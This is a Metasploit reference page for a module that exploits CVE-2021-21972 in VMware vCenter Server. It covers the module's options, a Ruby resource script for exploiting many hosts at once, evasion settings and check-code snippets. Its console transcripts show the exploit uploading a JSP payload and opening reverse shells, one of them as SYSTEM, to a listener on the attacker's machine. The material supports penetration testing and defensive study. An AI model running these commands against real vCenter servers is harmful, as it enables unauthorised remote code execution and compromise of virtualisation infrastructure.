VMware vCenter Server Unauthenticated OVA File Upload RCE - Metasploit


This page contains detailed information about how to use the exploit/multi/http/vmware_vcenter_uploadova_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: VMware vCenter Server Unauthenticated OVA File Upload RCE
Module: exploit/multi/http/vmware_vcenter_uploadova_rce
Source code: modules/exploits/multi/http/vmware_vcenter_uploadova_rce.rb
Disclosure date: 2021-02-23
Last modification time: 2021-07-14 15:10:25 +0000
Supported architecture(s): java
Supported platform(s): Linux, Windows
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2021-21972

This module exploits an unauthenticated OVA file upload and path traversal in VMware vCenter Server to write a JSP payload to a web-accessible directory. Fixed versions are 6.5 Update 3n, 6.7 Update 3l, and 7.0 Update 1c. Note that later vulnerable versions of the Linux appliance aren't exploitable via the webshell technique. Furthermore, writing an SSH public key to /home/vsphere-ui/.ssh/authorized_keys works, but the user's non-existent password expires 90 days after install, rendering the technique nearly useless against production environments. You'll have the best luck targeting older versions of the Linux appliance. The Windows target should work ubiquitously.

Module Ranking and Traits


Module Ranking:

  • manual: The exploit is unstable or difficult to exploit and is basically a DoS. This ranking is also used when the module has no use unless specifically configured by the user (e.g.: exploit/windows/smb/psexec). More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
  • artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.

Basic Usage


Using vmware_vcenter_uploadova_rce against a single host

Normally, you can use exploit/multi/http/vmware_vcenter_uploadova_rce this way:

msf > use exploit/multi/http/vmware_vcenter_uploadova_rce
msf exploit(vmware_vcenter_uploadova_rce) > show targets
    ... a list of targets ...
msf exploit(vmware_vcenter_uploadova_rce) > set TARGET target-id
msf exploit(vmware_vcenter_uploadova_rce) > show options
    ... show and set options ...
msf exploit(vmware_vcenter_uploadova_rce) > exploit

Using vmware_vcenter_uploadova_rce against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your vmware_vcenter_uploadova_rce will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/multi/http/vmware_vcenter_uploadova_rce")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • CheckModule: Module to check with

  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


Description

This module exploits an unauthenticated OVA file upload and path traversal in VMware vCenter Server to write a JSP payload to a web-accessible directory.

Fixed versions are 6.5 Update 3n, 6.7 Update 3l, and 7.0 Update 1c. Note that later vulnerable versions of the Linux appliance aren't exploitable via the webshell technique. Furthermore, writing an SSH public key to /home/vsphere-ui/.ssh/authorized_keys works, but the user's non-existent password expires 90 days after install, rendering the technique nearly useless against production environments.

You'll have the best luck targeting older versions of the Linux appliance. The Windows target should work ubiquitously.

Setup

Follow VMware's official documentation on installing and configuring vCenter Server, or you can wing it like me. The Linux appliance is meant to be deployed via ESXi, but I short-circuited the procedure by mounting the ISO and importing the OVA directly into VMware Fusion (or your desired hypervisor). YMMV.

wvu@kharak:~/Downloads$ hdiutil attach VMware-VCSA-all-6.7.0-11726888.iso
/dev/disk2                                              /Volumes/VMware VCSA
wvu@kharak:~/Downloads$ ls -l /Volumes/VMware\ VCSA/vcsa
total 4621748
-r-xr-xr-x  1 wvu  staff  2366330368 Jan 10  2019 VMware-vCenter-Server-Appliance-6.7.0.21000-11726888_OVF10.ova
dr-xr-xr-x  5 wvu  staff        2048 Jan 10  2019 ovftool
-r-xr-xr-x  1 wvu  staff          52 Jan 10  2019 version.txt
wvu@kharak:~/Downloads$

If you're using the workaround above, you'll need to connect to HTTPS port 5480 to complete Stage 2 of the faux deployment. You may need to set a root password in the console first. The vSphere Client should be accessible on port 443 after Stage 2 is complete.

You'll want to test versions earlier than 6.7 Update 3l, since that's patched. Later vulnerable versions of the Linux appliance aren't exploitable via the webshell technique. I haven't been able to download and test them all. Sorry.

Note: If you're testing on Windows, using Windows Server 2019 will fail miserably. Please use Windows Server 2016 or earlier. It must be Windows Server. I can't stress this enough!

PROTIP: Removing or otherwise disabling DNS resolution in the Linux appliance will make setup run faster if you don't have an FQDN and DNS server to back it up. This didn't seem to make a difference on Windows.

Verification Steps


Follow Setup and Scenarios.

Targets


0

This targets the Linux appliance with a JSP payload. VMware vCenter Server <= 6.7 Update 1b (Linux) is supported.

1

This targets the Windows install with a JSP payload. VMware vCenter Server <= 6.7 Update 3j (Windows) is supported.

Options


SprayAndPrayMin

Spray JSP payload path starting at this index.

SprayAndPrayMax

Spray JSP payload path stopping at this index.

Scenarios


VMware vCenter Server 6.7 Update 1b (Linux appliance)

msf6 > use exploit/multi/http/vmware_vcenter_uploadova_rce
[*] Using configured payload java/jsp_shell_reverse_tcp
msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > options

Module options (exploit/multi/http/vmware_vcenter_uploadova_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path
   VHOST                       no        HTTP server virtual host


Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   VMware vCenter Server <= 6.7 Update 1b (Linux)


msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > set rhosts 192.168.123.135
rhosts => 192.168.123.135
msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Using auxiliary/scanner/vmware/esx_fingerprint as check
[+] 192.168.123.135:443 - Identified VMware vCenter Server 6.7.0 build-11727113
[*] Scanned 1 of 1 hosts (100% complete)
[+] The target is vulnerable. Unauthenticated endpoint access granted.
[*] Uploading OVA file: O2qAd1Y7t0bhyUQFJ32Vyre6TQHcGoun.ova
[+] Successfully uploaded OVA file
[*] Requesting JSP payload: https://192.168.123.135/ui/resources/gVh2ROzD9QyyGNF6.jsp
[+] Successfully requested JSP payload
[*] Command shell session 1 opened (192.168.123.1:4444 -> 192.168.123.135:55342) at 2021-03-05 16:49:05 -0600
[+] Deleted /usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/41/0/h5ngc.war/resources/gVh2ROzD9QyyGNF6.jsp
[+] Deleted /usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/40/0/h5ngc.war/resources/gVh2ROzD9QyyGNF6.jsp

id
uid=1016(vsphere-ui) gid=100(users) groups=100(users),59001(cis)
uname -a
Linux photon-machine 4.4.161-1.ph1 #1-photon SMP Wed Oct 17 12:15:18 UTC 2018 x86_64 GNU/Linux
^Z
Background session 1? [y/N]  y

VMware vCenter Server 6.7 Update 3j on Windows Server 2016

msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > set target 1
target => 1
msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > set rhosts 192.168.123.194
rhosts => 192.168.123.194
msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Using auxiliary/scanner/vmware/esx_fingerprint as check
[+] 192.168.123.194:443 - Identified VMware vCenter Server 6.7.0 build-16709044
[*] Scanned 1 of 1 hosts (100% complete)
[+] The target is vulnerable. Unauthenticated endpoint access granted.
[*] Uploading OVA file: 0ggORbkxAcptUeH6U5S8.ova
[+] Successfully uploaded OVA file
[*] Requesting JSP payload: https://192.168.123.194/statsreport/UQbpAxH7WTmrzqcb7AugtYnMB2z0.jsp
[+] Successfully requested JSP payload
[*] Command shell session 2 opened (192.168.123.1:4444 -> 192.168.123.194:55411) at 2021-03-05 16:50:29 -0600
[!] Tried to delete /ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/UQbpAxH7WTmrzqcb7AugtYnMB2z0.jsp, unknown result


C:\Program Files\VMware\vCenter Server\perfcharts\wrapper\bin>whoami
whoami
nt authority\system

C:\Program Files\VMware\vCenter Server\perfcharts\wrapper\bin>

Go back to menu.

Msfconsole Usage


Here is how the multi/http/vmware_vcenter_uploadova_rce exploit module looks in the msfconsole:

msf6 > use exploit/multi/http/vmware_vcenter_uploadova_rce

[*] Using configured payload java/jsp_shell_reverse_tcp
msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > show info

       Name: VMware vCenter Server Unauthenticated OVA File Upload RCE
     Module: exploit/multi/http/vmware_vcenter_uploadova_rce
   Platform: Linux, Windows
       Arch: java
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Manual
  Disclosed: 2021-02-23

Provided by:
  Mikhail Klyuchnikov
  wvu <[email protected]>
  mr_me
  Viss

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   VMware vCenter Server <= 6.7 Update 1b (Linux)
  1   VMware vCenter Server <= 6.7 Update 3j (Windows)

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      443              yes       The target port (TCP)
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       Base path
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an unauthenticated OVA file upload and path 
  traversal in VMware vCenter Server to write a JSP payload to a 
  web-accessible directory. Fixed versions are 6.5 Update 3n, 6.7 
  Update 3l, and 7.0 Update 1c. Note that later vulnerable versions of 
  the Linux appliance aren't exploitable via the webshell technique. 
  Furthermore, writing an SSH public key to 
  /home/vsphere-ui/.ssh/authorized_keys works, but the user's 
  non-existent password expires 90 days after install, rendering the 
  technique nearly useless against production environments. You'll 
  have the best luck targeting older versions of the Linux appliance. 
  The Windows target should work ubiquitously.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2021-21972
  https://www.vmware.com/security/advisories/VMSA-2021-0002.html
  https://swarm.ptsecurity.com/unauth-rce-vmware/
  https://twitter.com/jas502n/status/1364810720261496843
  https://twitter.com/_0xf4n9x_/status/1364905040876503045
  https://twitter.com/HackingLZ/status/1364636303606886403
  https://kb.vmware.com/s/article/2143838
  https://nmap.org/nsedoc/scripts/vmware-version.html

Related modules:
  auxiliary/scanner/vmware/esx_fingerprint

Module Options


This is a complete list of options available in the multi/http/vmware_vcenter_uploadova_rce exploit:

msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > show options

Module options (exploit/multi/http/vmware_vcenter_uploadova_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path
   VHOST                       no        HTTP server virtual host

Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.

Exploit target:

   Id  Name
   --  ----
   0   VMware vCenter Server <= 6.7 Update 1b (Linux)

Advanced Options


Here is a complete list of advanced options supported by the multi/http/vmware_vcenter_uploadova_rce exploit:

msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > show advanced

Module advanced options (exploit/multi/http/vmware_vcenter_uploadova_rce):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   AutoCheck               true                                                no        Run check before exploit
   CheckModule             auxiliary/scanner/vmware/esx_fingerprint            yes       Module to check with
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FileDropperDelay                                                            no        Delay in seconds before attempting cleanup
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   ForceExploit            false                                               no        Override check result
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   SprayAndPrayMax         41                                                  yes       Deployer index stop
   SprayAndPrayMin         40                                                  yes       Deployer index start
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (java/jsp_shell_reverse_tcp):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/http/vmware_vcenter_uploadova_rce module can exploit:

msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   VMware vCenter Server <= 6.7 Update 1b (Linux)
   1   VMware vCenter Server <= 6.7 Update 3j (Windows)

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/vmware_vcenter_uploadova_rce exploit:

msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > show payloads

Compatible Payloads
===================

   #  Name                                Disclosure Date  Rank    Check  Description
   -  ----                                ---------------  ----    -----  -----------
   0  payload/generic/custom                               normal  No     Custom Payload
   1  payload/generic/shell_bind_tcp                       normal  No     Generic Command Shell, Bind TCP Inline
   2  payload/generic/shell_reverse_tcp                    normal  No     Generic Command Shell, Reverse TCP Inline
   3  payload/java/jsp_shell_bind_tcp                      normal  No     Java JSP Command Shell, Bind TCP Inline
   4  payload/java/jsp_shell_reverse_tcp                   normal  No     Java JSP Command Shell, Reverse TCP Inline

Evasion Options


Here is the full list of possible evasion options supported by the multi/http/vmware_vcenter_uploadova_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Target did not respond to check.


Here is a relevant code snippet related to the "Target did not respond to check." error message:

116:	      'method' => 'GET',
117:	      'uri' => normalize_uri(target_uri.path, '/ui/vropspluginui/rest/services/getstatus')
118:	    )
119:	
120:	    unless res
121:	      return CheckCode::Unknown('Target did not respond to check.')
122:	    end
123:	
124:	    case res.code
125:	    when 200
126:	      # {"States":"[]","Install Progress":"UNKNOWN","Config Progress":"UNKNOWN","Config Final Progress":"UNKNOWN","Install Final Progress":"UNKNOWN"}

Unauthenticated endpoint access granted.


Here is a relevant code snippet related to the "Unauthenticated endpoint access granted." error message:

131:	        'Config Progress',
132:	        'Config Final Progress'
133:	      ]
134:	
135:	      if (expected_keys & res.get_json_document.keys) == expected_keys
136:	        return CheckCode::Vulnerable('Unauthenticated endpoint access granted.')
137:	      end
138:	
139:	      CheckCode::Detected('Target did not respond with expected keys.')
140:	    when 401
141:	      CheckCode::Safe('Unauthenticated endpoint access denied.')

Target did not respond with expected keys.


Here is a relevant code snippet related to the "Target did not respond with expected keys." error message:

134:	
135:	      if (expected_keys & res.get_json_document.keys) == expected_keys
136:	        return CheckCode::Vulnerable('Unauthenticated endpoint access granted.')
137:	      end
138:	
139:	      CheckCode::Detected('Target did not respond with expected keys.')
140:	    when 401
141:	      CheckCode::Safe('Unauthenticated endpoint access denied.')
142:	    else
143:	      CheckCode::Detected("Target responded with code #{res.code}.")
144:	    end

Unauthenticated endpoint access denied.


Here is a relevant code snippet related to the "Unauthenticated endpoint access denied." error message:

136:	        return CheckCode::Vulnerable('Unauthenticated endpoint access granted.')
137:	      end
138:	
139:	      CheckCode::Detected('Target did not respond with expected keys.')
140:	    when 401
141:	      CheckCode::Safe('Unauthenticated endpoint access denied.')
142:	    else
143:	      CheckCode::Detected("Target responded with code #{res.code}.")
144:	    end
145:	  end
146:	

Target responded with code <RES.CODE>.


Here is a relevant code snippet related to the "Target responded with code <RES.CODE>." error message:

138:	
139:	      CheckCode::Detected('Target did not respond with expected keys.')
140:	    when 401
141:	      CheckCode::Safe('Unauthenticated endpoint access denied.')
142:	    else
143:	      CheckCode::Detected("Target responded with code #{res.code}.")
144:	    end
145:	  end
146:	
147:	  def exploit
148:	    upload_ova

Failed to upload OVA file


Here is a relevant code snippet related to the "Failed to upload OVA file" error message:

166:	      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
167:	      'data' => multipart_form.to_s
168:	    )
169:	
170:	    unless res && res.code == 200 && res.body == 'SUCCESS'
171:	      fail_with(Failure::NotVulnerable, 'Failed to upload OVA file')
172:	    end
173:	
174:	    register_files_for_cleanup(*jsp_paths)
175:	
176:	    print_good('Successfully uploaded OVA file')

Failed to request JSP payload


Here is a relevant code snippet related to the "Failed to request JSP payload" error message:

191:	      'method' => 'GET',
192:	      'uri' => jsp_uri
193:	    )
194:	
195:	    unless res && res.code == 200
196:	      fail_with(Failure::PayloadFailed, 'Failed to request JSP payload')
197:	    end
198:	
199:	    print_good('Successfully requested JSP payload')
200:	  end
201:	

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Mikhail Klyuchnikov
  • wvu
  • mr_me
  • Viss

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.